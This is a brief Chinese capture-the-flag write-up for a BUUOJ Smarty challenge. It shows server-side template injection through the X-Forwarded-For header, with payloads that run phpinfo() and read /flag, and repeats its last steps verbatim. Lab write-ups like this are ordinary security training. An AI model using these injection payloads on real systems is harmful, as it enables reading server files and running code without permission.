题目地址:https://buuoj.cn/challenges
解题思路
第一步:进入题目,看到提示Smarty,猜测使用模板注入漏洞
第二步:构建漏洞
使用burpsuite改包,添加X-Forwarded-For头,X-Forwarded-For:{if phpinfo()}{/if},发现执行了phpinfo()
第三步:获取flag
使用X-Forwarded-For:{if readfile('/flag')}{/if}获取flag
使用burpsuite改包,添加X-Forwarded-For头,X-Forwarded-For:{if phpinfo()}{/if},发现执行了phpinfo()
使用X-Forwarded-For:{if readfile('/flag')}{/if}获取flag